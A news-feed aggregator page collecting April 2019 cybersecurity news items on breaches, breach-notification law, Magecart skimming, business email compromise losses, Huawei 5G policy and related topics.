Feed aggregator

State of Washington Expands Breach Notice Laws

Info Security - Thu, 04/25/2019 - 19:44
State of Washington Expands Breach Notice Laws

A new law in Washington expanded regulations that mandate when consumers must be notified if a malicious actor gains access to their private data, according to a press release from the state’s office of the attorney general (AG).

In response to AG Bob Ferguson’s request for legislators to strengthen the state’s data breach notification laws, lawmakers voted unanimously in favor of HB 1071-2019-20, which the speaker signed on April 24.

“Not only is the amount of data being collected and stored about consumers increasing, the number of breaches of secure storage of the data is increasing at an alarming rate as well," Rep. Shelley Kloba, who sponsored the bill, said in the press release.

“This bill updates our consumer protection laws to shorten the notification time from 45 days to 30 days, so that consumers are made aware of a breach more quickly and can take protective action. Additionally, companies who collect and store data will need to pay more attention to safeguarding it against internal and external threats.”

In addition to reducing the notification time frame, the consumer data breach notification requirements bill was expanded to include more types of consumer information, such as usernames, passwords and passport numbers. The earlier bill had only mandated that consumers be notified if a data breach exposed their names in addition to other personal information, such as social security or driver’s license numbers.

“My office has seen the number of Washingtonians impacted by data breaches increase year after year,” Ferguson said in the press release. “Data breaches are a serious threat to our privacy, and this law will arm consumers with information to protect their sensitive data.”

Two senators sponsored a companion bill, SB 5046-2019-20, which remains in the Senate committee; however, another bill that would give citizens the right to know the types of data that companies are collecting, storing and selling has yet to pass the state’s legislature, according to a Tripwire blog post.

“This bill overwhelmingly cleared Washington’s Senate floor earlier in 2019 after a vote of 46 to 1,” the blog said, but it has not yet arrived on the floor of the House.

Categories: Cyber Risk News

Fake Social Accounts Multiply; Can Users ID Them?

Info Security - Thu, 04/25/2019 - 18:56
Fake Social Accounts Multiply; Can Users ID Them?

Despite Facebook and Twitter repeatedly removing illegitimate accounts from their social media platforms, the number of impersonating accounts increased 56% from 2017 to 2018 and is projected to continue to grow by 30% in 2019, according to research from ZeroFOX.

Because of this rapid proliferation of fake accounts, it is becoming increasingly more difficult for users to distinguish between accounts that are real or fake, the research found. In an April 23 blog post, ZeroFOX’s Diana Parks wrote, “There is no denying that fake profiles run rampant on social media and digital platforms. Between October 2017 and September 2018, Facebook alone removed almost 2.8 billion illegitimate accounts worldwide. By some estimates, this accounts for between 25–35% of all Facebook accounts.”

While fake accounts online are inevitable, they are also highly problematic and pose security risks to individuals and organizations. Bad actors use fraudulent accounts to target individuals using social engineering. Others use fake accounts for scams or to distribute malicious content, phishing and malware, or even inappropriate content.

Still, not everyone can easily distinguish which social media accounts are fake. Despite a 2018 post offering users tips on how to spot a fake account, the number of impersonating profiles has increased across social networking sites. This continued growth promoted ZeroFOX to develop a quiz in which users are challenged to correctly identify the fake social media account.

In addition, research from the ZeroFOX Alpha team found that since 2017 there has been a steady growth in the number of both brand and executive impersonations. “Between 2017 and 2018, brand impersonations for ZeroFOX customers increased by 5%. Based on current projections, the ZeroFOX Alpha Team anticipates an estimated 17% increase in brand impersonations over the next year. The numbers are even more staggering for executive impersonations,” Parks said.

Fake accounts impersonating top executives and VIPs reportedly grew by over 300% between 2017 and 2018 and are expected to rise another 47% in 2019.

Categories: Cyber Risk News

ASUS Not Alone in ShadowHammer Supply Chain Attack

Info Security - Thu, 04/25/2019 - 18:48
ASUS Not Alone in ShadowHammer Supply Chain Attack

Researchers believe that in last month’s malware attack, dubbed Operation ShadowHammer, the network of Taiwanese technology giant ASUS was not the only company targeted by supply chain attacks. According to Kaspersky Lab, during the ShadowHammer hacking operation, there were at least six other organizations that the attackers infiltrated.

“In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia,” Kaspersky researchers wrote in a blog post. Electronics Extreme Co. Ltd., a game developer from Thailand, was among the vendors listed as having released digitally signed binaries of a video game called Infestation: Survivor Stories, which was reportedly taken offline in 2016.

“This weaponization of code signing is direct evidence that machine identities are a beachhead for cyber-criminals. The only way to protect against these kinds of attacks is for every software development organization to make sure they are properly protected,” said Michael Thelander, director of product marketing, at Venafi.

“No one should be surprised at how extensive this attack is. Due to their wide reach, bad actors target code-signing certificates in broad, deliberate campaigns and leverage them in large, multi-stage attacks.”

Supply chain attacks have become increasingly concerning, according to the 2019 Internet Security Threat Report, which found that supply chain attacks rose by 78% between 2017 and 2018, prompting US intelligence agencies to partner in designating April as Supply Chain Integrity Month.

“Software subversion attacks – such as the ASUS Live Update intrusions – are particularly difficult to thwart because they are incredibly sophisticated and highly targeted,” said Chris Duvall, senior director at The Chertoff Group.

“Unfortunately, due to the apparent success rate, we can expect to see a continued surge in the use of third-party applications as the back channel into networks. While not a panacea, we advise clients to help prevent these attacks by accessing file integrity whenever possible and maintaining good cyber hygiene through configuration hardening, vulnerability management, segmentation.”

Categories: Cyber Risk News

IoT Set to Put Strain on Cyber Skills Market

Info Security - Thu, 04/25/2019 - 10:01
IoT Set to Put Strain on Cyber Skills Market

UK demand for cybersecurity skills rose 10% year-on-year in the last quarter of 2018, with adoption of the Internet of Things (IoT) technologies set to put further strain on the market going forward, according to Experis.

The recruitment company’s latest Experis Industry Insiders report revealed a near 17% increase in advertised cybersecurity roles from the previous quarter, to 13,214.

However, average permanent salaries actually dropped slightly, by 2% year-on-year to £58,557, as employers sought out short-term solutions to fill their skills gaps. Contractor day rates jumped nearly 20% over the previous year, to £505.

In the IoT space, the number of new roles advertised jumped 49% quarter-on-quarter to Q4 2018. Permanent (1.5%) and contractor (4%) average salaries both increased.

“IoT offers huge opportunities for organizations, if they have the right cybersecurity foundations in place to take advantage of new innovations safely. We can see that there is a strong demand for top talent, but the market is struggling to keep pace,” argued Experis director of specialist markets, Martin Ewings.

“Businesses are having to be creative and take a blended approach to their talent acquisition strategies — tapping into the contractor market to build a hybrid team of permanent and temporary workers. In doing so, they can have fast access to the skills they need right now, while taking a longer-term view by building permanent capabilities and investing the time required to enable strategic development.”

However, building these permanent capabilities will be challenging given continued global shortfalls. Skills shortages in cybersecurity have reached nearly three million worldwide, including 142,000 in EMEA, according to (ISC)2.

Defense contractor Raytheon is doing its bit by announcing this week a new cyber-apprenticeships scheme as part of a £2m investment strategy which also includes a Cyber Academy to train university students.

The firm claimed there would be opportunities for 70 cyber-apprentices each year for the two-year program, which offers an alternative to three- and four-year degree courses. Plans are in place to certify around 280 apprentices over four years.

Categories: Cyber Risk News

Dark Web’s Wall Street Market Suspected of Exit Scam

Info Security - Thu, 04/25/2019 - 09:53
Dark Web’s Wall Street Market Suspected of Exit Scam

Dark web drugs marketplace Wall Street Market appears to have become the latest underground site to be hit by an exit scam, taking with it an estimated $30m of users’ money.

News has swirled for days that the site’s owners are about to pull the plug, with suspicions raised after an official moderator published a notice claiming that it had suffered a server crash. This meant it was unable to synchronize bitcoin wallets with the blockchain, the individual claimed.

“Due to this incident, we were forced to send crypto assets manually to the waiting list bitcoin wallet, as we have to wait for this process to complete, so that coins can be sent to the appropriate matching escrow wallet,” the post continued.

“Our technical advisors said that the platform will soon shift to the maintenance mode in order to prevent sending of more bitcoins, and they estimated the synchronization process to be successfully completed yesterday.”

However, multiple posts on dark web Reddit-like forum Dread claim this is merely a distraction designed to buy the administrators time while they drain funds, according to Deepdotweb.

Users have also taken to Reddit to complain about problems with the site, suggesting that its owners have decided to exit scam after a large influx of users and money that came from the recently shuttered Dream Market.

Exit scams typically occur when dark web sites stop shipping orders but continue to accept payment. Once a significant pot of money is built up in escrow, the administrators take it and close the site.

This latest incident highlights the continued uncertainty of doing business on the dark web. Law enforcers have done their best to disrupt some of the biggest marketplaces in recent years, notably with the take downs of Hansa and Alpha Bay in 2017.

Things had begun to stabilize since then, but exit scams are a constant concern and widely seen as a cost of doing business on the dark web.

It could be that the administrators of Wall Street Market decided to do a runner with the money rather than face the potential scrutiny of investigators.

Categories: Cyber Risk News

Report: 42% of Used Drives Sold on eBay Hold Sensitive Data

Info Security - Thu, 04/25/2019 - 09:20
Report: 42% of Used Drives Sold on eBay Hold Sensitive Data

A new report from Blancco Technology Group has warned that those looking to make some money by selling used storage drives may be putting themselves at risk of falling victim to cybercrime.

As detailed in Privacy for Sale: Data Security Risks in the Second-Hand IT Asset Marketplace, Blancco, in conjunction with Ontrack, analyzed 159 leading brand drives purchased through auction site eBay in the US, UK, Germany and Finland, discovering that almost half (42%) still held sensitive data.

What’s more, 15% of the drives assessed were found to contain personally identifiable information (PII), despite sellers surveyed by Blancco as part of the research stating they had used proper data sanitization methods to ensure no data was left behind. This worrying finding suggests that although sellers recognize the need to remove any data before looking to sell-on a storage drive, the methods they are using are inadequate.

“Selling old hardware via an online marketplace might feel like a good option, but in reality, it creates a serious risk of exposing dangerous levels of personal data,” said Fredrik Forslund, VP, cloud and data erasure, Blancco. “By putting this equipment into the wrong hands, irreversible damage will be caused – not just to the seller, but their employer, friends and family members.”

It is also clear that there is confusion around the right methods of data erasure, Forslund added, as each seller was under the impression that data had been permanently removed.

“It’s critical to securely erase any data on drives before passing them onto another party, using the appropriate methods to confirm that it’s truly gone. Education on best ways to permanently remove data from devices is a vital investment to negate the very real risk of falling victim to identity theft, or other methods of cybercrime.”

“Deleting data is notoriously difficult,” added Sam Curry, chief security officer at Cybereason. “Most people don’t understand and probably shouldn’t have to understand how indexing works, but most so-called deletion just removes pointers to data and not the data itself.

“Destruction of the device really doesn’t make the data go away either; sure parts of it might be damaged or hard to read because the media can't be plugged in easily. The data, however, persists.

“The conventional best practices for securely decommissioning drives before disposal are to get professionals that you trust (and that’s a big deal and another subject) to really wipe and rewrite every trace ‘three times,’ which feels a little like overkill to laypeople. It does matter, though, when the data you have is in trust from and for other people.”

Categories: Cyber Risk News

#CYBERUK19: GCHQ Ramps Up Intelligence Sharing with UK Firms

Info Security - Thu, 04/25/2019 - 08:55
#CYBERUK19: GCHQ Ramps Up Intelligence Sharing with UK Firms

GCHQ boss Jeremy Fleming has revealed how the government listening post has improved its collaboration with UK businesses over the past year, to enable intelligence sharing within seconds.

Fleming told an audience of IT security professionals at the government’s CYBERUK conference in Glasgow yesterday that the agency is sharing intelligence with banks to enable real-time customer alerts, as well as the wider business community.

“In the last year we have made it simple for our analysts to share time critical, secret information in a matter of seconds. With just one click, this information is being shared and action is being taken,” he added.

“In the coming year, we will continue to scale this capability so — whether it's indicators of a nation state cyber actor, details of malware used by cyber-criminals or credit cards being sold on the dark web — we will declassify this information and get it back to those who can act on it.”

This is the result of the Industry100 initiative coordinated by GCHQ’s National Cyber Security Centre (NCSC). Fleming claimed it had been so successful that the project will be made permanent in the future.

Another sign of its effectiveness came in helping protect smaller firms against what appears to have been a Magecart campaign.

“This year, we identified over 1200 sites which were serving malicious code to illicitly copy credit card transactions,” said Fleming. “We were able to help these small businesses fix the problem and protect their customers and their reputation.”

The government’s vision to make the UK the safest place to live and work online will require a “national effort” to achieve — involving both public and private sectors and consumers, he claimed.

Sarah Armstrong-Smith, head of continuity & resilience at Fujitsu, agreed that public-private partnerships are key to tackling cyber-threats.

“By working collaboratively, organizations can share with each other, their partners and government, practical knowledge, intelligence and technological innovation that helps fight cybersecurity threats and increase resilience,” she added. “In order to make a stand and stop cyber-criminals, we must unite in our efforts to tackle the continuing challenge that we all face.”

Jake Moore, cyber security specialist at ESET, also welcomed the industry outreach efforts by GCHQ.

“GCHQ working more closely with banks and other businesses can’t come soon enough. Consumers have been in desperate need for help and support from law enforcement for quite some time as so few people are aware of how to protect themselves online,” he argued.

“Cybersecurity awareness is a national issue and those who are unaware of the magnitude of the problem require extra support. Sharing intelligence in real time with banks might be the difference between someone losing their life savings and being able to stop the attack in the first place.”

Categories: Cyber Risk News

Insider Threats a Top Risk to Healthcare

Info Security - Wed, 04/24/2019 - 18:46
Insider Threats a Top Risk to Healthcare

Across the healthcare sector, ransomware is reportedly no longer the most prevalent security threat, according to new research from Vectra that found attacks decreased during the second half of 2018.

The Vectra 2019 Spotlight Report on Healthcare found that internal human error and misuse occur much more frequently than hacking. In addition, a growing number of errors are the result of unmanaged devices and lateral movement of device-to-device communication.

Based on data from the Attacker Behavior Industry Report (2019 RSA Conference Edition), researchers also observed network behaviors from a sampling of 354 opt-in enterprise organizations in healthcare and eight other industries.

Among the findings, the report noted that attackers hide command-and-control communications in healthcare networks using HTTPS tunnels. “Hidden HTTPS tunnels are the most common behavior detected in healthcare. This traffic represents external communication involving multiple sessions over long periods of time that appear to be normal encrypted web traffic. When attackers hide their command-and-control communications in HTTPS tunnels, it often looks like service provider traffic,” the report said.

Researchers also found that hidden domain name system (DNS) tunnels were commonly used to mask data exfiltration behaviors, as these behaviors can also be caused by IT and security tools that use DNS communication.

The second most-common behavior consistent with data exfiltration in healthcare, according to the research, is the smash and grab. “This occurs when a large volume of data is sent to an external destination not commonly in use, in a short period of time.”

Security cameras are able to quickly send mass volumes of data to a hosted cloud site, but smash-and-grab behaviors can appear to be normal operation for an IoT device. As a result, low and slow attackers are able to use it for obfuscation.

“Healthcare organizations struggle with managing legacy systems and medical devices that traditionally have weak security controls, yet both provide critical access to patient health information,” said Chris Morales, head of security analytics at Vectra. “Improving visibility into network behavior enables healthcare organizations to manage risk of legacy systems and new technology they embrace.”

Categories: Cyber Risk News

Magecart Swoops in to Strike Atlanta Hawks Shop

Info Security - Wed, 04/24/2019 - 17:08
Magecart Swoops in to Strike Atlanta Hawks Shop

The online shop for the Atlanta Hawks currently states that it is temporarily down for maintenance, and according to Sanguine Security, the ecommerce site is the latest victim of a Magecart attack.

In the wild, hawks hold their place at the top of the food chain. On the court, the Atlanta Hawks boast 29 wins for the 2018–2019 season. The ecommerce store, though, reportedly has a weak link in its supply chain.

"Yesterday, we were alerted that the host site for HawksShop.com was subject to an isolated attack," a spokesperson for the Hawks organization said. "We take these matters of security and privacy extremely seriously. Upon receiving that information, we disabled all payment and checkout capabilities to prevent any further incident.

"At this stage of the investigation, we believe that less than a handful of purchases on HawksShop.com were affected. We are continuing to investigate and will provide updates as needed."

According to an April 23 post, Magecart thieves injected a payment skimmer in the online store of the Atlanta Hawks. 

As many online stores do, the Atlanta Hawks shop also runs Magento Commerce Cloud 2.2, a commonly used enterprise-grade e-commerce system, owned by Adobe. While Magento itself is quite secure, attackers often use insecure third-party components to gain access to the core of the shop system,” Sanguine Labs wrote.

Leveraging vulnerabilities in third parties has proven successful for the Magecart group, which is also reportedly responsible for infecting hundreds of websites via supply chains. “Cyber-criminals have found that this card-skimming malware is stealth and effective in securing credit card information off of websites. This payment card information can have a huge impact on customers, far beyond the unauthorized use of their cards,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.

“Payment card information, combined with other user data from other breaches and social media, builds a complete profile. Using these real identities, and sometimes fake identities with valid credentials, allows cyber-criminals to take over accounts, apply for loans and much more. This is why more companies today are implementing user verification platforms that include passive biometrics that verify users based on more parameters than just their personally identifiable information.”

Sanguine Labs reported that the time frame for detection is small, with new attacks being discovered each week. In addition to using automation to identify and prevent attacks, “passive biometric technology is making stolen data valueless by verifying users based on their inherent behavior instead of relying on their data. This makes it challenging for bad actors to access illegitimate accounts, as they can't replicate the customer’s inherent behavior,” Zuk said.

Categories: Cyber Risk News

Magecart Swoops in to Strike Atlanta Hawks Shop

Info Security - Wed, 04/24/2019 - 17:08
Magecart Swoops in to Strike Atlanta Hawks Shop

The online shop for the Atlanta Hawks currently states that it is temporarily down for maintenance, and according to Sanguine Security, the ecommerce site is the latest victim of a Magecart attack.

In the wild, hawks hold their place at the top of the food chain. On the court, the Atlanta Hawks boast 29 wins for the 2018–2019 season. The ecommerce store, though, reportedly has a weak link in its supply chain.

"Yesterday, we were alerted that the host site for HawksShop.com was subject to an isolated attack," a spokesperson for the Hawks organization said. "We take these matters of security and privacy extremely seriously. Upon receiving that information, we disabled all payment and checkout capabilities to prevent any further incident.

"At this stage of the investigation, we believe that less than a handful of purchases on HawksShop.com were affected. We are continuing to investigate and will provide updates as needed."

According to an April 23 post, Magecart thieves injected a payment skimmer in the online store of the Atlanta Hawks. 

As many online stores do, the Atlanta Hawks shop also runs Magento Commerce Cloud 2.2, a commonly used enterprise-grade e-commerce system, owned by Adobe. While Magento itself is quite secure, attackers often use insecure third-party components to gain access to the core of the shop system,” Sanguine Labs wrote.

Leveraging vulnerabilities in third parties has proven successful for the Magecart group, which is also reportedly responsible for infecting hundreds of websites via supply chains. “Cyber-criminals have found that this card-skimming malware is stealth and effective in securing credit card information off of websites. This payment card information can have a huge impact on customers, far beyond the unauthorized use of their cards,” said Ryan Zuk, VP of customer success for NuData Security, a Mastercard company.

“Payment card information, combined with other user data from other breaches and social media, builds a complete profile. Using these real identities, and sometimes fake identities with valid credentials, allows cyber-criminals to take over accounts, apply for loans and much more. This is why more companies today are implementing user verification platforms that include passive biometrics that verify users based on more parameters than just their personally identifiable information.”

Sanguine Labs reported that the time frame for detection is small, with new attacks being discovered each week. In addition to using automation to identify and prevent attacks, “passive biometric technology is making stolen data valueless by verifying users based on their inherent behavior instead of relying on their data. This makes it challenging for bad actors to access illegitimate accounts, as they can't replicate the customer’s inherent behavior,” Zuk said.

Categories: Cyber Risk News

Online Fitness Store Gets One-Upped by Hackers

Info Security - Wed, 04/24/2019 - 15:44
Online Fitness Store Gets One-Upped by Hackers

Lifting weights might build strength for the body, but for customers of Bodybuilding.com, bulking up wasn’t enough to stop hackers from stealing their personal data. According to a security notice issued by the popular online fitness store, Bodybuilding.com recently experienced a security incident that may have affected customer information.

“We became aware of a data security incident involving unauthorized access to our systems in February 2019. We engaged one of the leading data security firms to conduct a thorough investigation, which traced the unauthorized activity to a phishing email received in July 2018,” according to the statement.

“On April 12, 2019, we concluded our investigation and could not rule out that personal information may have been accessed. While we have no evidence that personal information was accessed or misused, we are notifying all current and former customers and users about the incident out of an abundance of caution to explain the circumstances as we understand them.”

In the aftermath of discovering the incident, the company contacted law enforcement and brought in external forensic investigators. Additionally, the notice to customers said that the company will be forcing a password reset upon the next login for all of its customers.

The company does not store full credit or debit card information, but customers do have the option of storing card information in their accounts. In those cases, Bodybuilding.com only stores the last four digits of the card, and according to the statement, it never stores the full card number.

“While we have no evidence that personal information was accessed or misused, information you provided to us which might have been accessed in this incident could include name, email address, billing/shipping addresses, phone number, order history, any communications with Bodybuilding.com, birthdate, and any information included in your BodySpace profile,” the company said, adding that much of the information in the BodySpace profile is already public.

“We’re never out of danger from a data breach of our personal information and passwords, as the Bodybuilding.com incident reminds us. Despite the fact that web applications often house sensitive consumer data, they are often forgotten when it comes to implementing security measures,” said Oscar Tovar, vulnerability verification specialist, WhiteHat Security.

“Since Bodybuilding.com’s breach was a phishing attack, this showcases the importance of ongoing security training for employees. Organizations’ people continue to be the single largest threat vector for successful breaches. In addition, this paints a large target on an organization making them an easy target for hackers, who can exploit them and gain access to sensitive information. Every single company that touches sensitive data needs to make security a consistent, top-of-mind concern.”

Categories: Cyber Risk News

BBC presenter wins personal service company case

Outlaw.com - Wed, 04/24/2019 - 10:49
ITV's 'Loose Women' presenter Kaye Adams has won a tax tribunal case in which HM Revenue & Customs (HMRC) claimed that her personal services company (PSC) should have applied IR35 rules to payments made by the BBC for presenting a BBC Scotland radio programme. 
Categories: Cyber Risk News

FBI: BEC Losses Surged to $1.3bn in 2018

Info Security - Wed, 04/24/2019 - 10:25
FBI: BEC Losses Surged to $1.3bn in 2018

The FBI dealt with cyber-attacks causing losses of over $2.7bn in 2018, nearly half of which were linked to Business Email Compromise (BEC) scams.

In total, there were over 20,000 victims of BEC/Email Account Compromise (EAC) last year, leading to losses of just under $1.3bn, the largest of any cybercrime type. The nearest to this were confidence fraud/romance scams ($362m) and investment cybercrime ($253m), according to the 2018 Internet Crime Report.

The FBI noted an increase in the number of gift card BEC scams, of the sort spotted by Agari recently. The security vendor claimed fraudsters are increasingly transferring their victims from email to mobile communications early on in the scam.

The largest group losing money to cyber-criminals was the over-60s ($649m), followed by the 50-59 age group ($495m). This could be partly explained by the continued prevalence of tech support scams which predominantly target the elderly. There were over 14,000 reported victims last year, linked to losses reaching almost $39m — a 161% increase from 2017.

Elsewhere, the number of reported ransomware victims dropped from 1783 to 1493 cases. However, the losses incurred by these victims rose from $2.3m to $3.6m. What’s more, these estimates don’t include lost business, wages, files, equipment, productivity or third-party remediation.

“In some cases, victims do not report any loss amount to the FBI, thereby creating an artificially low ransomware loss rate. Lastly, the number only represents what victims report to the FBI via the IC3 and does not account for victim direct reporting to FBI field offices/agents,” the report claimed.

Finally, the FBI also noted a strong surge in extortion-related attacks in 2018. The 51,000+ complaints it received accounted for losses of over $83m, a 242% increase on 2017 figures. These included DoS attacks, “hitman schemes,” sextortion, government impersonation schemes, loan schemes, and high-profile data breaches.

Categories: Cyber Risk News

Online Thief Cracks Private Keys to Steal $54m in ETH

Info Security - Wed, 04/24/2019 - 09:39
Online Thief Cracks Private Keys to Steal $54m in ETH

An individual or group of hackers have managed to amass over $54m in stolen digital currency by raiding digital wallets improperly secured with private keys, according to a new report.

Consultancy Independent Security Evaluators (ISE) claimed the “Blockchainbandit” had taken advantage of poorly implemented private keys to transfer nearly 38,000 in Ethereum (ETH) out of the targeted wallets to one under its control.

That was the figure as of January 13, 2018, but it may be many times greater today, the firm warned. In a test operation, it placed a dollar’s worth of ETH in a weak private key-derived wallet and saw it transferred out to the attacker within seconds.

In total, ISE claimed it was able to guess or duplicate 732 weak private keys in use on the Ethereum blockchain, highlighting a potential issue with key generation by developers.

The firm suggested that programming errors in the software generating these keys has made them easy to brute force.

It hypothesized that a 256-bit private key may have been truncated due to coding mistakes, meaning it’s insufficiently complex. Other possible errors suggested by the researchers included “error codes used as keys, memory reference issues, object confusion, stack corruption, heap corruption, or unchecked pre-compiled coding errors.”

It’s even possible that users were allowed to choose their own keys, it’s claimed.

“The bottom line is that a private key needs to be random, unique, and practically impossible to guess in a brute force attack,” argued ISE executive Partner, Ted Harrington.

ISE urged developers to use well-known libraries or platform-specific modules for random number generation; use a cryptographically secure pseudo-random number generator; audit code for truncated keys; and use multiple sources of entropy. It also claimed developers should review NIST guidelines on cryptographic random number generation.

Categories: Cyber Risk News

UK Government Allows Huawei to Provide ‘Non-Core’ 5G Kit

Info Security - Wed, 04/24/2019 - 09:07
UK Government Allows Huawei to Provide ‘Non-Core’ 5G Kit

The British government has decided to allow Huawei to provide equipment for carriers’ 5G networks, but only ‘non-core’ technology, according to reports.

Prime Minister Theresa May made the decision after a meeting of the National Security Council (NSC), despite apparent concerns raised by foreign secretary Jeremy Hunt, home secretary Sajid Javid, defence secretary Gavin Williamson, and international development secretary Penny Mordaunt.

The partial ban will see the Shenzhen giant only able to provide equipment such as antennas, which are not deemed a potential national security risk. However, the distinction between what constitutes the 5G core and non-core has been questioned by intelligence chiefs.

Australian Signals Directorate director-general, Mike Burgess, warned in a speech last year: “The distinction between core and edge collapses in 5G networks. That means that a potential threat anywhere in the network will be a threat to the whole network.”

For its part, GCHQ has been fairly measured in its treatment of Huawei, despite growing pressure from the US to follow its lead with an outright ban.

In a speech in Singapore earlier this year, director Jeremy Fleming, focused on the need for greater competition in the 5G market to improve cybersecurity. That echoed his counterpart at the National Cyber Security Centre (NCSC), Ciaran Martin, who argued that its evaluation center had found “serious problems with [Huawei’s] security and engineering processes.”

“As we said then, and repeat today, these problems are about standard of cybersecurity; they are not indicators of hostile activity by China,” he continued.

The UK decision will not go down well in Washington, which has already threatened allies such as Germany by claiming it will withhold intelligence information in the future if the country allows Huawei to build its 5G networks, fearing Chinese snoopers may be listening in.

Australia has stood by its Five Eyes partner the US in issuing a total ban on Huawei for 5G networks, while the New Zealand Government Communications Security Bureau is still deciding. The Chinese firm opened a transparency center in Brussels recently in a bid to convince local lawmakers that it poses no threat.

Categories: Cyber Risk News

European Parliament Approves Mass ID Database Plans

Info Security - Tue, 04/23/2019 - 10:35
European Parliament Approves Mass ID Database Plans

The European Parliament has approved plans to boost physical security by implementing a mass identity database, although privacy concerns persist.

The Common Identity Repository (CIR) will centralize the personal information of nearly all non-EU citizens in the EU’s visa-free Schengen region. The latter covers the vast majority of the EU except for Ireland and the UK, as well as Bulgaria, Croatia, Cyprus, and Romania.

The data — which will include fingerprints, names, addresses, photos and other info — will be consolidated from five separate systems, including databases of asylum seekers, short-stay visa applicants, and those with previous criminal convictions in the EU.

The idea is that it will enhance security in the region by minimizing information gaps and silos, helping law enforcers track terrorists and serious criminals who may otherwise be able to slip across borders undetected. Data on an estimated 300 million non-EU and some EU citizens will be stored in the CIR, according to reports.

“Global law enforcement agencies and border control personnel have been sharing information about people for decades, if not centuries,” argued John Gunn, CMO at OneSpan.

“CIR is a very positive move that will simply make the methods more timely, efficient, and effective resulting in speedier cross-border travels with less hassle and in greater safety for all as those with evil intent are more easily identified and stopped.”

However, other have voiced concerns that there are not enough safeguards to protect individual freedoms, and that the database could be a major target for hackers. EU privacy advisory body the Article 29 Working Party (WP29) explained these at length in a document last year.

“Regarding the Common Identity Repository (CIR), the WP29 is of the view that the cross-matching of various sources for identification and consolidating them in a new common database for the purpose of overall identification poses an additional interference with the rights to privacy and data protection,” it said.

“The WP29 is not convinced of the necessity and proportionality to establish such a mixed-purpose identification database including biometric data. Whether identity fraud is in practice such an essential threat to the internal security of the Union as to justify the central registering of biometric identifiers of all bona fide [third country nationals] TCN travellers, migrants and asylum seekers is not yet sufficiently established in terms of proportionality and therefore remain an issue of major concern.”

Categories: Cyber Risk News

Addiction Center Patients Exposed in Privacy Snafu

Info Security - Tue, 04/23/2019 - 09:28
Addiction Center Patients Exposed in Privacy Snafu

A large trove of personally identifiable information (PII) has been leaked by an addiction treatment center after researchers found another unsecured Elasticsearch database online.

Justin Paine, who is also a director of trust and safety at Cloudflare, blogged about his findings late last week, claiming to have found the offending database via a simple Shodan search.

As the data trove required no authentication to access, he was able to scroll through the 1.45GB of information. Although there were nearly five million documents contained in the database, they related in the end to around 146,000 unique patients.

Paine traced them back to Pennsylvania-based addiction treatment center Steps to Recovery.

“A leak of PII related to 146,316 unique patients would be bad on any day. It's particularly bad when it is something as sensitive as a addiction rehab center. Given the stigma that surrounds addiction this is almost certainly not information the patients want easily accessible,” he argued.

“What could a malicious user do with this data? Based on the patient name it was simple to locate all medical procedures a specific person received, when they received those procedures, how much they were billed, and at which specific facility they received treatment.”

After a few cursory Google searches, he was also able to determine with “high confidence” a patient’s age, birthdate, address, previous addresses, family members’ names, their political affiliation, phone numbers and email addresses.

Despite contacting the firm about the privacy snafu at the end of March, Paine had received no response as of April 15 and there are concerns that it has still not notified patients about the risk of identity theft. However, a message he sent to the hosting provider was received and access to the database subsequently restricted.

It’s just the latest in a long line of incidents involving misconfigured Elasticsearch instances. One revealed in November last year exposed the PII of nearly 82 million Americans.

Categories: Cyber Risk News

Cyber Readiness Worsens as Attacks Soar

Info Security - Tue, 04/23/2019 - 09:02
Cyber Readiness Worsens as Attacks Soar

The number of organizations in Europe and the US that have been hit by a cyber-attack over the past year has soared to over three-fifths (61%), according to a new report from Hiscox.

The global insurer today released the results of its Hiscox Cyber Readiness Report 2019, which is compiled from interviews with over 5300 cybersecurity professionals in the US, UK, Belgium, France, Germany, Spain and the Netherlands.

It revealed a sharp increase in the number of firms suffering an attack, up from 45% in the 2018 report. In the UK, the figure rose from 40% to 55%.

There was also a rise in the number of small (from 33% to 47%) and medium-sized businesses (36% to 63%) reporting an attack, across the US and Europe.

Two-thirds of firms (65%) on average claimed to have been hit by supply chain cyber incidents.

Average losses were also up by 61%: from $229,000 last year to $369,000 this, a figure exceeding $700,000 for large firms versus just $162,000 in 2018.

Although cybersecurity spending went up by 24% over the past year to reach $1.45m, only 10% of responding organizations were classed as “experts” in terms of their cyber-readiness, with nearly three-quarters (74%) described as unprepared “novices.” Disappointingly, there was a sizeable drop in the number of large US and German firms achieving “expert” scores.

Hiscox cyber CEO, Gareth Wharton, argued that cyber-attacks have become “the unavoidable cost of doing business today.” 

‘This is the third Hiscox Cyber Readiness Report and, for the first time, a significant majority of firms report one or more cyber-attacks in the past 12 months. Where hackers formerly focused on larger companies, small and medium-sized firms now look equally vulnerable,” he explained.

“The one positive is that we see more firms taking a structured approach to the problem, with a defined role for managing cyber strategy and an increased readiness to transfer the risk to an insurer by way of a standalone cyber-insurance policy.”

Categories: Cyber Risk News

Singapore Responds to Recent Cybersecurity Attacks

Info Security - Mon, 04/22/2019 - 14:49
Singapore Responds to Recent Cybersecurity Attacks

During a visit to San Francisco, Singapore foreign affairs minister Vivian Balakrishnan commented that the country cannot "go back to pen and paper. ... If people lose confidence in the integrity and security of the system, then all these aspirations cannot be fulfilled."

The comments follow information coming into the open regarding data breaches, one of which affected 14,200 individuals diagnosed with HIV up to January 2013. In a statement by the police, it was confirmed that the information was "in the possession of an unauthorized person" and had been illegally disclosed online.

The statement went on to say that the information was in the possession of Mikhy K. Farrera Brochez, a male US citizen residing in Singapore between January 2008 and June 2016. He was convicted of fraud and drug-related offences in March 2017, sentenced to 28 months in prison and deported from Singapore. The fraud offences were in relation to Brochez lying about his HIV status to the Ministry of Manpower in order to obtain and maintain his employment pass.

According to Bloomberg, Balakrishnan said the government’s response to recent cybersecurity attacks and human leaks has to be one where "it’s completely open." It follows the first meeting of the Public Sector Data Security Review Committee, which was held on April 18, 2019, according to a government statement. 

Bloomberg reported that attendees of the meeting "reviewed past data incidents" and broad approaches to raise the bar of security. The committee will submit its final report to the prime minister by the end of November 2019. 

Singapore has been trying to position itself as a "Smart Nation," with initiatives focusing on digital identity, smart urban mobility and e-payments. However, the data breaches have made many people nervous, especially with the ambitions of artificial intelligence (AI) clear. 

“The ability to deploy AI in our respective fields should be commoditized,” Balarkrishman said. “We will be one of the earliest adopters of these new technologies.”

Categories: Cyber Risk News

WannaCry 'Hero' Pleads Guilty to Writing Malware in US Court

Info Security - Mon, 04/22/2019 - 14:04
WannaCry 'Hero' Pleads Guilty to Writing Malware in US Court

Marcus Hutchins, also known as MalwareTech, has pleaded guilty in a US court to two counts of creating and spreading malware. The reverse-engineer is well known for his contribution to ending the WannaCry ransomware attacks in May 2017. 

